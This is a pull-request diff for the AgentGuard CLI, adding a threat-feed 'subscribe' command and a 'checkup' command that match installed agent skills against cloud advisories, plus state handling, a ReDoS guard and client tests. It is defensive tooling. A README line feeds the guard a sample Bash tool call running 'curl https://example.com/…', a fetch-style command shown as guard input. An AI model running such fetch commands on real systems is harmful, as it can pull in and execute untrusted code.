### PR TITLE
feat: subscribe to AgentGuard Cloud threat feed + auto self-check

### DIFF
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -1,5 +1,16 @@
 # Changelog
 
+## [Unreleased]
+
+### Added
+- `agentguard subscribe` — pulls new threat-feed advisories from AgentGuard Cloud (`GET /api/v1/feed/advisories`), runs a self-check against locally installed skills, and reports matches back via `POST /api/v1/feed/self-check-report`. State persisted at `~/.agentguard/feed-state.json` so successive runs only process new entries.
+- `agentguard checkup --against-advisory <id>` — on-demand self-check for a single advisory. Useful when you just want to know "am I affected by AGS-2026-…?" without subscribing.
+- `src/feed/` module: `Advisory` / `AdvisoryAffected` / `FeedState` types modelled after OSV.dev, a self-check engine that matches by `namePattern` / `sha256` / `bodyRegex`, and a small state store.
+- `CloudRequestError` exported from `src/cloud/client.ts` so feed callers can branch on HTTP status (notably 404, which lets the CLI fall back gracefully when running against an older AgentGuard Cloud that doesn't expose the feed yet).
+
+### Changed
+- `normalizeCloudUrl` now accepts `http://` for loopback hosts (`localhost`, `127.0.0.1`, `::1`, `0.0.0.0`) in addition to https-everywhere-else. Required for local dev and unit tests against a local Cloud build; production URLs are unaffected.
+
 ## [1.1.3] - 2026-05-12
 
 ### Added

--- a/README.md
+++ b/README.md
@@ -67,6 +67,14 @@ printf '{"tool_name":"Bash","tool_input":{"command":"curl https://example.com/in
 # Optional: connect paid AgentGuard Cloud policy, audit, and approvals
 AGENTGUARD_API_KEY=ag_live_xxxxx agentguard connect --url https://agentguard.gopluslabs.io
 
+# Optional: subscribe to AgentGuard's threat-intelligence feed. Pulls newly
+# published advisories from Cloud, runs a self-check against your installed
+# skills, and reports matches back. Run in cron / on boot.
+agentguard subscribe
+
+# Or run a one-off self-check against a single advisory id
+agentguard checkup --against-advisory AGS-2026-0042
+
 # Optional: write host-specific hook templates
 agentguard init --agent claude-code
 agentguard init --agent codex

--- a/src/cli.ts
+++ b/src/cli.ts
@@ -18,6 +18,9 @@ import { saveCachedPolicy } from './runtime/policy.js';
 import type { RuntimeActionType, RuntimeAgentHost } from './runtime/types.js';
 import { installAgentTemplates, type AgentInstaller } from './installers.js';
 import { packageVersion } from './version.js';
+import { runSelfCheckForAdvisory } from './feed/selfcheck.js';
+import { loadFeedState, markAdvisorySeen, saveFeedState } from './feed/state.js';
+import type { Advisory, SelfCheckResult } from './feed/types.js';
 
 async function main() {
   const program = new Command();
@@ -161,6 +164,130 @@ async function main() {
       if (!result) return;
       console.log(formatProtectResult(result, Boolean(options.json)));
       process.exitCode = exitCodeForDecision(result.decision);
+    });
+
+  program
+    .command('subscribe')
+    .description('Pull new threat-feed advisories from AgentGuard Cloud and run a self-check against locally installed skills')
+    .option('--since <iso>', 'Override the persisted last-pulled timestamp')
+    .option('--json', 'Emit machine-readable summary instead of human text')
+    .option('--no-report', 'Skip uploading self-check results back to Cloud')
+    .action(async (options) => {
+      const config = ensureConfig();
+      const client = new AgentGuardCloudClient(config);
+      const state = loadFeedState();
+      const since = (options.since as string | undefined) ?? state.lastPulledAt;
+
+      let advisories: Advisory[] | null;
+      try {
+        advisories = await client.pullAdvisories(since);
+      } catch (err) {
+        console.error(`! Could not reach AgentGuard Cloud: ${(err as Error).message}`);
+        process.exitCode = 1;
+        return;
+      }
+      if (advisories === null) {
+        // 404 — older Cloud build without the feed endpoint. Not an error.
+        if (options.json) {
+          console.log(JSON.stringify({ supported: false, results: [] }));
+        } else {
+          console.log('AgentGuard Cloud does not expose /api/v1/feed/advisories yet — nothing to do.');
+        }
+        return;
+      }
+
+      const seen = new Set(state.seenAdvisoryIds ?? []);
+      const fresh = advisories.filter((a) => !seen.has(a.id));
+      const results: SelfCheckResult[] = [];
+      let latestPublishedAt = state.lastPulledAt;
+
+      for (const advisory of fresh) {
+        const result = await runSelfCheckForAdvisory(advisory);
+        results.push(result);
+        if (options.report !== false && client.connected && result.matchedArtifacts.length > 0) {
+          // Caller asked us to report AND we actually matched something.
+          await client
+            .reportSelfCheck(advisory.id, result.matchedArtifacts, {
+              elapsedMs: result.elapsedMs,
+              warnings: result.warnings,
+            })
+            .catch((err) => {
+              console.error(`! Failed to report self-check for ${advisory.id}: ${(err as Error).message}`);
+            });
+        }
+        Object.assign(state, markAdvisorySeen(state, advisory.id));
+        if (!latestPublishedAt || advisory.publishedAt > latestPublishedAt) {
+          latestPublishedAt = advisory.publishedAt;
+        }
+      }
+
+      state.lastPulledAt = latestPublishedAt;
+      saveFeedState(state);
+
+      if (options.json) {
+        console.log(JSON.stringify({ supported: true, pulled: advisories.length, fresh: fresh.length, results }, null, 2));
+        return;
+      }
+
+      const totalMatches = results.reduce((acc, r) => acc + r.matchedArtifacts.length, 0);
+      console.log(`Pulled ${advisories.length} advisory record(s); ${fresh.length} new.`);
+      if (fresh.length === 0) return;
+      console.log(`Self-check found ${totalMatches} match(es) across the new advisories.`);
+      for (const r of results) {
+        if (r.matchedArtifacts.length === 0) continue;
+        console.log(`  - ${r.advisoryId}: ${r.matchedArtifacts.length} match(es)`);
+        for (const m of r.matchedArtifacts) {
+          console.log(`      · ${m.path}  [${m.matchedBy}]`);
+        }
+      }
+      process.exitCode = totalMatches > 0 ? 2 : 0;
+    });
+
+  program
+    .command('checkup')
+    .description('Run a self-check immediately. Without --against-advisory, scans for everything in the feed cache.')
+    .option('--against-advisory <id>', 'Restrict the check to a single advisory id (fetches it from Cloud if needed)')
+    .option('--json', 'Emit machine-readable result')
+    .action(async (options) => {
+      const config = ensureConfig();
+      const client = new AgentGuardCloudClient(config);
+      const advisoryId = options.againstAdvisory as string | undefined;
+
+      if (!advisoryId) {
+        console.log('Tip: pass --against-advisory <id> for now. A broader, full-fleet checkup is coming.');
+        console.log('Meanwhile, run `agentguard subscribe` to pull the feed and self-check new entries.');
+        return;
+      }
+
+      let advisory: Advisory | null = null;
+      try {
+        const all = await client.pullAdvisories();
+        advisory = all?.find((a) => a.id === advisoryId) ?? null;
+      } catch (err) {
+        console.error(`! Could not reach AgentGuard Cloud: ${(err as Error).message}`);
+        process.exitCode = 1;
+        return;
+      }
+      if (!advisory) {
+        console.error(`No advisory with id "${advisoryId}" found in the current feed window.`);
+        process.exitCode = 1;
+        return;
+      }
+
+      const result = await runSelfCheckForAdvisory(advisory);
+      if (options.json) {
+        console.log(JSON.stringify(result, null, 2));
+      } else {
+        console.log(`Advisory ${result.advisoryId}: ${result.matchedArtifacts.length} match(es)`);
+        for (const m of result.matchedArtifacts) {
+          console.log(`  · ${m.path}  [${m.matchedBy}]`);
+        }
+        if (result.warnings.length) {
+          console.log('Warnings:');
+          for (const w of result.warnings) console.log(`  ! ${w}`);
+        }
+      }
+      process.exitCode = result.matchedArtifacts.length > 0 ? 2 : 0;
     });
 
   await program.parseAsync(process.argv);

--- a/src/cli.ts
+++ b/src/cli.ts
@@ -197,27 +197,56 @@ async function main() {
       }
 
       const seen = new Set(state.seenAdvisoryIds ?? []);
-      const fresh = advisories.filter((a) => !seen.has(a.id));
+      // Process oldest-first so the cursor can advance monotonically and we
+      // never skip over an advisory that failed mid-batch.
+      const fresh = advisories
+        .filter((a) => !seen.has(a.id))
+        .sort((a, b) => (a.publishedAt < b.publishedAt ? -1 : 1));
       const results: SelfCheckResult[] = [];
+      let cursorOk = true; // stops advancing on the first hard failure
       let latestPublishedAt = state.lastPulledAt;
+      let hardFailures = 0;
 
       for (const advisory of fresh) {
-        const result = await runSelfCheckForAdvisory(advisory);
+        let processed = true;
+        let result: SelfCheckResult;
+        try {
+          result = await runSelfCheckForAdvisory(advisory);
+        } catch (err) {
+          // runSelfCheck shouldn't throw, but if it does the advisory has
+          // not been evaluated — don't mark it seen and don't advance.
+          console.error(`! Self-check threw for ${advisory.id}: ${(err as Error).message}`);
+          hardFailures += 1;
+          cursorOk = false;
+          continue;
+        }
         results.push(result);
+
         if (options.report !== false && client.connected && result.matchedArtifacts.length > 0) {
-          // Caller asked us to report AND we actually matched something.
-          await client
-            .reportSelfCheck(advisory.id, result.matchedArtifacts, {
+          // Report is on the critical path — if Cloud doesn't see the
+          // match, we must NOT mark the advisory seen, otherwise a
+          // transient network blip silently buries a real hit.
+          try {
+            await client.reportSelfCheck(advisory.id, result.matchedArtifacts, {
               elapsedMs: result.elapsedMs,
               warnings: result.warnings,
-            })
-            .catch((err) => {
-              console.error(`! Failed to report self-check for ${advisory.id}: ${(err as Error).message}`);
             });
+          } catch (err) {
+            console.error(`! Failed to report self-check for ${advisory.id}: ${(err as Error).message}`);
+            processed = false;
+            hardFailures += 1;
+          }
         }
-        Object.assign(state, markAdvisorySeen(state, advisory.id));
-        if (!latestPublishedAt || advisory.publishedAt > latestPublishedAt) {
-          latestPublishedAt = advisory.publishedAt;
+
+        if (processed) {
+          Object.assign(state, markAdvisorySeen(state, advisory.id));
+          if (cursorOk && (!latestPublishedAt || advisory.publishedAt > latestPublishedAt)) {
+            latestPublishedAt = advisory.publishedAt;
+          }
+        } else {
+          // From this point we no longer advance the pull cursor — the
+          // failed advisory must be re-pulled on the next run.
+          cursorOk = false;
         }
       }
 
@@ -240,7 +269,16 @@ async function main() {
           console.log(`      · ${m.path}  [${m.matchedBy}]`);
         }
       }
-      process.exitCode = totalMatches > 0 ? 2 : 0;
+      // Exit codes: 2 = matches found, 1 = at least one advisory failed
+      // to evaluate or report (cursor was held back), 0 = clean.
+      if (hardFailures > 0) {
+        console.error(`! ${hardFailures} advisory record(s) failed to process and will be re-pulled next run.`);
+        process.exitCode = 1;
+      } else if (totalMatches > 0) {
+        process.exitCode = 2;
+      } else {
+        process.exitCode = 0;
+      }
     });
 
   program

--- a/src/cloud/client.ts
+++ b/src/cloud/client.ts
@@ -8,6 +8,7 @@ import type {
 } from '../runtime/types.js';
 import { redactMetadata, redactPreview } from '../runtime/redaction.js';
 import { buildAuditEvent } from '../runtime/audit.js';
+import type { Advisory, SelfCheckMatch } from '../feed/types.js';
 
 interface ApiSuccess<T> {
   success: true;
@@ -66,6 +67,57 @@ export class AgentGuardCloudClient {
     return body.data.approvalId || null;
   }
 
+  /**
+   * Pull threat-feed advisories newer than `since`. Returns null when the
+   * cloud doesn't expose the endpoint yet (404) — callers should treat null
+   * as "no new advisories" rather than an error, so the subscribe command
+   * works against older AgentGuard Cloud versions too.
+   */
+  async pullAdvisories(since?: string): Promise<Advisory[] | null> {
+    const params = new URLSearchParams();
+    if (since) params.set('since', since);
+    const qs = params.toString();
+    const path = `/api/v1/feed/advisories${qs ? `?${qs}` : ''}`;
+    try {
+      const body = await this.request<{ advisories: Advisory[] }>(path);
+      return body.data.advisories ?? [];
+    } catch (err) {
+      if (err instanceof CloudRequestError && err.status === 404) {
+        return null;
+      }
+      throw err;
+    }
+  }
+
+  /**
+   * Report the outcome of a single advisory self-check. Matches paths are
+   * redacted by the caller before they get here. Tolerates 404 so subscribe
+   * still completes locally even if the report sink is absent server-side.
+   */
+  async reportSelfCheck(
+    advisoryId: string,
+    matches: SelfCheckMatch[],
+    options: { elapsedMs?: number; warnings?: string[] } = {}
+  ): Promise<void> {
+    this.requireApiKey();
+    try {
+      await this.request('/api/v1/feed/self-check-report', {
+        method: 'POST',
+        body: JSON.stringify({
+          advisoryId,
+          matches,
+          elapsedMs: options.elapsedMs,
+          warnings: options.warnings,
+        }),
+      });
+    } catch (err) {
+      if (err instanceof CloudRequestError && err.status === 404) {
+        return;
+      }
+      throw err;
+    }
+  }
+
   private async request<T = unknown>(path: string, init: RequestInit = {}): Promise<ApiSuccess<T>> {
     const response = await fetch(`${this.cloudUrl}${path}`, {
       ...init,
@@ -78,7 +130,7 @@ export class AgentGuardCloudClient {
     });
     const body = (await response.json().catch(() => null)) as ApiSuccess<T> | null;
     if (!response.ok || !body?.success) {
-      throw new Error(`AgentGuard Cloud request failed: ${response.status}`);
+      throw new CloudRequestError(response.status, path);
     }
     return body;
   }
@@ -87,6 +139,16 @@ export class AgentGuardCloudClient {
     if (!this.apiKey) {
       throw new Error('AgentGuard Cloud API key is not configured.');
     }
+  }
+}
+
+export class CloudRequestError extends Error {
+  constructor(
+    public readonly status: number,
+    public readonly path: string
+  ) {
+    super(`AgentGuard Cloud request failed: ${status} (${path})`);
+    this.name = 'CloudRequestError';
   }
 }
 

--- a/src/config.ts
+++ b/src/config.ts
@@ -116,6 +116,8 @@ export function validateApiKey(apiKey: string): void {
   }
 }
 
+const LOOPBACK_HOSTS = new Set(['localhost', '127.0.0.1', '::1', '0.0.0.0']);
+
 export function normalizeCloudUrl(value: string): string {
   const normalized = value.replace(/\/+$/, '');
   let parsed: URL;
@@ -124,8 +126,11 @@ export function normalizeCloudUrl(value: string): string {
   } catch {
     throw new Error('Invalid Cloud URL.');
   }
-  if (parsed.protocol !== 'https:') {
-    throw new Error('Invalid Cloud URL. AgentGuard Cloud URLs must use https://.');
+  const isLoopback = LOOPBACK_HOSTS.has(parsed.hostname);
+  if (parsed.protocol !== 'https:' && !(parsed.protocol === 'http:' && isLoopback)) {
+    throw new Error(
+      'Invalid Cloud URL. AgentGuard Cloud URLs must use https:// (http:// allowed only for loopback hosts).'
+    );
   }
   return normalized;
 }

--- a/src/feed/selfcheck.ts
+++ b/src/feed/selfcheck.ts
@@ -1,0 +1,174 @@
+/**
+ * Self-check engine — runs a single threat-feed advisory against the locally
+ * installed skills / plugins / MCP servers and reports which artifacts match.
+ *
+ * Designed to be cheap (read-only filesystem ops, hashing only when an
+ * advisory actually asks for a hash) and never crash on a single bad artifact.
+ */
+
+import { existsSync } from 'node:fs';
+import { readFile, readdir, stat } from 'node:fs/promises';
+import { homedir } from 'node:os';
+import { basename, join } from 'node:path';
+import { hashDirectory, hashFile } from '../utils/hash.js';
+import type {
+  Advisory,
+  AdvisoryAffected,
+  SelfCheckMatch,
+  SelfCheckResult,
+} from './types.js';
+
+/**
+ * Default search locations for each ecosystem.
+ *
+ * Skill locations cover the four agent frameworks that use the agentskills.io
+ * SKILL.md standard: Claude Code, OpenClaw, Hermes Agent, Cursor (project
+ * scope only — caller can supply extra roots). MCP server locations cover
+ * Claude Code's `~/.claude.json` and Codex's `~/.codex/config.toml` install
+ * conventions, but inspection of those is config-aware and lives elsewhere.
+ */
+export const DEFAULT_SKILL_ROOTS = [
+  join(homedir(), '.claude', 'skills'),
+  join(homedir(), '.openclaw', 'skills'),
+  join(homedir(), '.openclaw', 'workspace', 'skills'),
+  join(homedir(), '.hermes', 'skills'),
+];
+
+export interface RunSelfCheckOptions {
+  /** Override the default per-ecosystem search roots. */
+  skillRoots?: string[];
+  /** Cap on hashing work: skill dirs beyond this count are skipped. */
+  maxArtifacts?: number;
+}
+
+/**
+ * Run one advisory against the local environment. Never throws — failures
+ * become warnings on the result so the caller can keep iterating advisories.
+ */
+export async function runSelfCheckForAdvisory(
+  advisory: Advisory,
+  options: RunSelfCheckOptions = {}
+): Promise<SelfCheckResult> {
+  const startedAt = Date.now();
+  const matches: SelfCheckMatch[] = [];
+  const warnings: string[] = [];
+
+  if (advisory.withdrawnAt) {
+    return { advisoryId: advisory.id, matchedArtifacts: [], elapsedMs: 0, warnings };
+  }
+
+  if (advisory.ecosystem !== 'skill') {
+    warnings.push(`ecosystem "${advisory.ecosystem}" not implemented; only "skill" is supported in this build`);
+    return { advisoryId: advisory.id, matchedArtifacts: [], elapsedMs: Date.now() - startedAt, warnings };
+  }
+
+  const roots = options.skillRoots ?? DEFAULT_SKILL_ROOTS;
+  const skillDirs = await listSkillDirs(roots);
+  const cap = options.maxArtifacts ?? 500;
+  const considered = skillDirs.slice(0, cap);
+  if (skillDirs.length > cap) {
+    warnings.push(`only checked first ${cap} of ${skillDirs.length} skill directories`);
+  }
+
+  for (const dir of considered) {
+    try {
+      const m = await matchSkillDir(dir, advisory.affected);
+      if (m) matches.push(m);
+    } catch (err) {
+      warnings.push(`skipped ${dir}: ${(err as Error).message}`);
+    }
+  }
+
+  return {
+    advisoryId: advisory.id,
+    matchedArtifacts: matches,
+    elapsedMs: Date.now() - startedAt,
+    warnings,
+  };
+}
+
+/** Enumerate every immediate subdirectory of `roots` that contains a SKILL.md. */
+async function listSkillDirs(roots: string[]): Promise<string[]> {
+  const found: string[] = [];
+  for (const root of roots) {
+    if (!existsSync(root)) continue;
+    let entries;
+    try {
+      entries = await readdir(root, { withFileTypes: true });
+    } catch {
+      continue;
+    }
+    for (const entry of entries) {
+      if (!entry.isDirectory()) continue;
+      const skillPath = join(root, entry.name);
+      const manifest = join(skillPath, 'SKILL.md');
+      if (existsSync(manifest)) found.push(skillPath);
+    }
+  }
+  return found;
+}
+
+/**
+ * Match one skill directory against an advisory's affected[] matchers.
+ * Returns the first match found (per matcher precedence: hash > regex > name).
+ * Returns null when nothing matched.
+ */
+async function matchSkillDir(
+  skillDir: string,
+  affected: AdvisoryAffected[]
+): Promise<SelfCheckMatch | null> {
+  const name = basename(skillDir);
+  const manifestPath = join(skillDir, 'SKILL.md');
+
+  // Hashing is expensive — only compute if some matcher asks for it.
+  let localHash: string | null = null;
+  const wantsHash = affected.some((m) => m.sha256);
+  if (wantsHash) {
+    const st = await stat(skillDir);
+    localHash = st.isDirectory() ? await hashDirectory(skillDir) : await hashFile(skillDir);
+  }
+
+  // Regex matching needs the manifest body — only read if some matcher asks.
+  let body: string | null = null;
+  const wantsBody = affected.some((m) => m.bodyRegex);
+  if (wantsBody) {
+    try {
+      body = await readFile(manifestPath, 'utf8');
+    } catch {
+      body = '';
+    }
+  }
+
+  for (const matcher of affected) {
+    if (matcher.sha256 && localHash && matcher.sha256.toLowerCase() === localHash.toLowerCase()) {
+      return { path: skillDir, matchedBy: 'sha256', hash: localHash };
+    }
+    if (matcher.bodyRegex && body !== null) {
+      try {
+        const re = new RegExp(matcher.bodyRegex);
+        if (re.test(body)) {
+          return { path: skillDir, matchedBy: 'bodyRegex' };
+        }
+      } catch {
+        // bad regex from upstream — skip silently; warnings handled by caller scope.
+      }
+    }
+    if (matcher.namePattern && globMatch(matcher.namePattern, name)) {
+      return { path: skillDir, matchedBy: 'namePattern' };
+    }
+  }
+  return null;
+}
+
+/**
+ * Simple glob match supporting `*` as a single-segment wildcard. Sufficient
+ * for `slack-webhook-*` style advisories without pulling in a glob lib.
+ */
+export function globMatch(pattern: string, value: string): boolean {
+  const re = new RegExp(
+    '^' +
+      pattern.replace(/[.+^${}()|[\]\\]/g, '\\$&').replace(/\*/g, '[^/]*') +
+      '$'
+  );
+  return re.test(value);
+}

--- a/src/feed/selfcheck.ts
+++ b/src/feed/selfcheck.ts
@@ -7,10 +7,10 @@
  */
 
 import { existsSync } from 'node:fs';
-import { readFile, readdir, stat } from 'node:fs/promises';
+import { readFile, readdir } from 'node:fs/promises';
 import { homedir } from 'node:os';
 import { basename, join } from 'node:path';
-import { hashDirectory, hashFile } from '../utils/hash.js';
+import { hashFile } from '../utils/hash.js';
 import type {
   Advisory,
   AdvisoryAffected,
@@ -120,12 +120,17 @@ async function matchSkillDir(
   const name = basename(skillDir);
   const manifestPath = join(skillDir, 'SKILL.md');
 
-  // Hashing is expensive — only compute if some matcher asks for it.
+  // Canonical hash input: the SKILL.md content. The cloud publishes
+  // SKILL.md hashes (not directory rollups), so this is the field that
+  // must match server-side for `sha256` matchers to be meaningful.
   let localHash: string | null = null;
   const wantsHash = affected.some((m) => m.sha256);
-  if (wantsHash) {
-    const st = await stat(skillDir);
-    localHash = st.isDirectory() ? await hashDirectory(skillDir) : await hashFile(skillDir);
+  if (wantsHash && existsSync(manifestPath)) {
+    try {
+      localHash = await hashFile(manifestPath);
+    } catch {
+      localHash = null;
+    }
   }
 
   // Regex matching needs the manifest body — only read if some matcher asks.
@@ -134,6 +139,8 @@ async function matchSkillDir(
   if (wantsBody) {
     try {
       body = await readFile(manifestPath, 'utf8');
+      // Cap body length to keep regex evaluation bounded.
+      if (body.length > MAX_BODY_BYTES) body = body.slice(0, MAX_BODY_BYTES);
     } catch {
       body = '';
     }
@@ -144,13 +151,8 @@ async function matchSkillDir(
       return { path: skillDir, matchedBy: 'sha256', hash: localHash };
     }
     if (matcher.bodyRegex && body !== null) {
-      try {
-        const re = new RegExp(matcher.bodyRegex);
-        if (re.test(body)) {
-          return { path: skillDir, matchedBy: 'bodyRegex' };
-        }
-      } catch {
-        // bad regex from upstream — skip silently; warnings handled by caller scope.
+      if (safeRegexTest(matcher.bodyRegex, body)) {
+        return { path: skillDir, matchedBy: 'bodyRegex' };
       }
     }
     if (matcher.namePattern && globMatch(matcher.namePattern, name)) {
@@ -158,6 +160,44 @@ async function matchSkillDir(
     }
   }
   return null;
+}
+
+/**
+ * Defense against catastrophic backtracking and malformed regex coming
+ * from upstream advisory data:
+ *   - cap the pattern length
+ *   - reject patterns with obvious nested-quantifier shapes that explode
+ *     under ReDoS (e.g. `(.+)+`, `(a*)*`, `(a|a)*`)
+ *   - swallow compile errors silently (treated as "no match")
+ *
+ * Node's RegExp has no built-in timeout; the cheap-but-effective fix is
+ * to bound both the pattern and the body. We accept a slight false-negative
+ * rate over freezing on a hostile feed.
+ */
+const MAX_REGEX_LEN = 256;
+const MAX_BODY_BYTES = 256 * 1024;
+const CATASTROPHIC = [
+  /\([^)]*[+*]\)[+*]/, // nested quantifier: (x+)+
+  /\(([^|()]+\|)+\1\)[+*]/, // alternation duplicate: (a|a)*
+];
+
+export function safeRegexTest(pattern: string, body: string): boolean {
+  if (typeof pattern !== 'string' || pattern.length === 0) return false;
+  if (pattern.length > MAX_REGEX_LEN) return false;
+  for (const danger of CATASTROPHIC) {
+    if (danger.test(pattern)) return false;
+  }
+  let re: RegExp;
+  try {
+    re = new RegExp(pattern);
+  } catch {
+    return false;
+  }
+  try {
+    return re.test(body);
+  } catch {
+    return false;
+  }
 }
 
 /**

--- a/src/feed/state.ts
+++ b/src/feed/state.ts
@@ -1,0 +1,56 @@
+/**
+ * Local feed-subscription state I/O.
+ *
+ * Persisted at `~/.agentguard/feed-state.json` so the `subscribe` command
+ * doesn't re-process the same advisory across invocations / cron ticks.
+ *
+ * Kept tiny (single JSON object) on purpose — bigger ledgers go through the
+ * audit log path, not here.
+ */
+
+import { existsSync, mkdirSync, readFileSync, writeFileSync } from 'node:fs';
+import { dirname, join } from 'node:path';
+import { getAgentGuardPaths } from '../config.js';
+import type { FeedState } from './types.js';
+
+const SEEN_ID_LIMIT = 1000;
+
+function statePath(): string {
+  return join(getAgentGuardPaths().home, 'feed-state.json');
+}
+
+export function loadFeedState(): FeedState {
+  const file = statePath();
+  if (!existsSync(file)) return {};
+  try {
+    const raw = readFileSync(file, 'utf8');
+    const parsed = JSON.parse(raw) as Partial<FeedState>;
+    return {
+      lastPulledAt: parsed.lastPulledAt,
+      seenAdvisoryIds: parsed.seenAdvisoryIds ?? [],
+    };
+  } catch {
+    // Corrupt state file: pretend it's empty rather than crash. The next
+    // successful subscribe will overwrite it.
+    return {};
+  }
+}
+
+export function saveFeedState(state: FeedState): void {
+  const file = statePath();
+  mkdirSync(dirname(file), { recursive: true });
+  const trimmed: FeedState = {
+    lastPulledAt: state.lastPulledAt,
+    seenAdvisoryIds: (state.seenAdvisoryIds ?? []).slice(-SEEN_ID_LIMIT),
+  };
+  writeFileSync(file, `${JSON.stringify(trimmed, null, 2)}\n`, { mode: 0o600 });
+}
+
+export function markAdvisorySeen(state: FeedState, advisoryId: string): FeedState {
+  const set = new Set(state.seenAdvisoryIds ?? []);
+  set.add(advisoryId);
+  return {
+    ...state,
+    seenAdvisoryIds: [...set],
+  };
+}

--- a/src/feed/types.ts
+++ b/src/feed/types.ts
@@ -1,0 +1,108 @@
+/**
+ * Threat-feed advisory types.
+ *
+ * AgentGuard Cloud publishes `Advisory` objects describing newly discovered
+ * supply-chain threats (malicious skills, rugged MCP servers, prompt-injection
+ * patterns in popular plugins). Subscribing local guards pull the feed,
+ * run a targeted self-check, and report back which local artifacts matched.
+ *
+ * Schema intentionally mirrors the OSV.dev advisory shape (signed JSON over
+ * HTTPS, `affected[]` array of identifier matchers) so the feed can later be
+ * federated with OSV and OSS Insight.
+ */
+
+/** Supply-chain ecosystem an advisory targets. */
+export type AdvisoryEcosystem = 'skill' | 'plugin' | 'mcp_server';
+
+export type AdvisorySeverity = 'low' | 'medium' | 'high' | 'critical';
+
+/**
+ * One matcher inside `Advisory.affected[]`. A local artifact matches the
+ * advisory if ANY matcher matches. A matcher matches if ALL of its fields
+ * that are set match the artifact (so name + hash narrows the match).
+ */
+export interface AdvisoryAffected {
+  /**
+   * Glob-ish name pattern matched against the skill's `name` field or the
+   * containing directory name. Supports `*` as a single-segment wildcard.
+   * Example: `slack-webhook-*`.
+   */
+  namePattern?: string;
+  /**
+   * Specific SHA-256 hash (hex, lowercase) of the artifact's content
+   * (a directory hash for skill dirs, file hash for single-file artifacts).
+   * Exact match.
+   */
+  sha256?: string;
+  /**
+   * Optional semver range. Reserved for future use — current matchers
+   * ignore version unless explicitly set. Tools should treat unknown ranges
+   * as "match any version" rather than fail closed.
+   */
+  versionRange?: string;
+  /**
+   * Optional regex applied to the textual body of `SKILL.md` (or the file
+   * contents for non-skill artifacts). Use this when the threat manifests as
+   * a code/text pattern rather than a known hash.
+   */
+  bodyRegex?: string;
+}
+
+export interface Advisory {
+  /** Stable identifier, e.g. `AGS-2026-0042`. */
+  id: string;
+  ecosystem: AdvisoryEcosystem;
+  severity: AdvisorySeverity;
+  /** Short headline. <= 120 chars. */
+  summary: string;
+  /** Long-form markdown body. May include remediation steps. */
+  detailsMd: string;
+  /** Matchers — local artifact matches the advisory if ANY entry matches. */
+  affected: AdvisoryAffected[];
+  /** ISO-8601 timestamp when published. */
+  publishedAt: string;
+  /** Optional withdrawal timestamp — if set, the advisory was retracted. */
+  withdrawnAt?: string | null;
+  /**
+   * Optional HMAC-SHA256 hex signature of the canonical JSON payload, signed
+   * with the cloud's per-publisher key. Subscribers can verify integrity if
+   * they have the verifier key. Empty when the cloud doesn't sign yet.
+   */
+  signature?: string;
+  /** External references — Snyk, NVD, GHSA, blog posts. */
+  references?: string[];
+}
+
+/**
+ * Local feed-subscription state. Persisted between `subscribe` runs so the
+ * client doesn't re-process advisories it has already seen.
+ */
+export interface FeedState {
+  /** ISO-8601 timestamp of the latest advisory `publishedAt` we've processed. */
+  lastPulledAt?: string;
+  /** Stable IDs of advisories already evaluated; bounded LRU. */
+  seenAdvisoryIds?: string[];
+}
+
+/**
+ * Result of running a single advisory's checks against the local environment.
+ */
+export interface SelfCheckResult {
+  advisoryId: string;
+  /** Always populated, even when empty (means "we checked, nothing matched"). */
+  matchedArtifacts: SelfCheckMatch[];
+  /** Wall-clock duration in milliseconds. */
+  elapsedMs: number;
+  /** Errors per-matcher that prevented a definitive answer. Non-fatal. */
+  warnings: string[];
+}
+
+export interface SelfCheckMatch {
+  /** Local path to the matched artifact (skill dir / file). Redaction is the
+   *  caller's responsibility before reporting upstream. */
+  path: string;
+  /** Which matcher hit. Useful for explaining "why" to the user. */
+  matchedBy: 'namePattern' | 'sha256' | 'bodyRegex';
+  /** When matched by hash, this is the local hash that equalled the advisory's. */
+  hash?: string;
+}

--- a/src/tests/feed-cloud.test.ts
+++ b/src/tests/feed-cloud.test.ts
@@ -1,0 +1,104 @@
+import { describe, it, before, after } from 'node:test';
+import assert from 'node:assert/strict';
+import { createServer, type Server } from 'node:http';
+import { AddressInfo } from 'node:net';
+import { AgentGuardCloudClient, CloudRequestError } from '../cloud/client.js';
+
+type Handler = (req: any, res: any) => void;
+
+function startServer(handler: Handler): Promise<{ url: string; server: Server }> {
+  return new Promise((resolve) => {
+    const server = createServer(handler);
+    server.listen(0, '127.0.0.1', () => {
+      const { port } = server.address() as AddressInfo;
+      resolve({ url: `http://127.0.0.1:${port}`, server });
+    });
+  });
+}
+
+describe('cloud client — feed methods', () => {
+  let baseUrl: string;
+  let server: Server;
+  let lastRequest: { url: string; method: string; body?: unknown } | null = null;
+  let nextResponse: { status: number; body: unknown } = { status: 200, body: {} };
+
+  before(async () => {
+    const started = await startServer(async (req, res) => {
+      const chunks: Buffer[] = [];
+      for await (const chunk of req) chunks.push(chunk as Buffer);
+      const raw = Buffer.concat(chunks).toString('utf8');
+      lastRequest = { url: req.url, method: req.method, body: raw ? JSON.parse(raw) : undefined };
+      res.statusCode = nextResponse.status;
+      res.setHeader('content-type', 'application/json');
+      res.end(JSON.stringify(nextResponse.body));
+    });
+    baseUrl = started.url;
+    server = started.server;
+  });
+
+  after(() => {
+    server.close();
+  });
+
+  it('pullAdvisories returns advisories on 200', async () => {
+    nextResponse = {
+      status: 200,
+      body: {
+        success: true,
+        data: {
+          advisories: [
+            {
+              id: 'AGS-2026-1',
+              ecosystem: 'skill',
+              severity: 'high',
+              summary: 's',
+              detailsMd: '',
+              affected: [{ namePattern: 'foo' }],
+              publishedAt: '2026-05-13T00:00:00Z',
+            },
+          ],
+        },
+      },
+    };
+    const client = new AgentGuardCloudClient({ cloudUrl: baseUrl, apiKey: 'ag_live_x' });
+    const result = await client.pullAdvisories('2026-05-12T00:00:00Z');
+    assert.equal(result?.length, 1);
+    assert.equal(result?.[0].id, 'AGS-2026-1');
+    assert.match(lastRequest!.url, /\/api\/v1\/feed\/advisories\?since=/);
+  });
+
+  it('pullAdvisories returns null on 404 (older Cloud)', async () => {
+    nextResponse = { status: 404, body: { success: false, error: { message: 'Not found' } } };
+    const client = new AgentGuardCloudClient({ cloudUrl: baseUrl, apiKey: 'ag_live_x' });
+    const result = await client.pullAdvisories();
+    assert.equal(result, null);
+  });
+
+  it('pullAdvisories throws on other errors', async () => {
+    nextResponse = { status: 500, body: { success: false, error: { message: 'boom' } } };
+    const client = new AgentGuardCloudClient({ cloudUrl: baseUrl, apiKey: 'ag_live_x' });
+    await assert.rejects(() => client.pullAdvisories(), (err: unknown) => err instanceof CloudRequestError && err.status === 500);
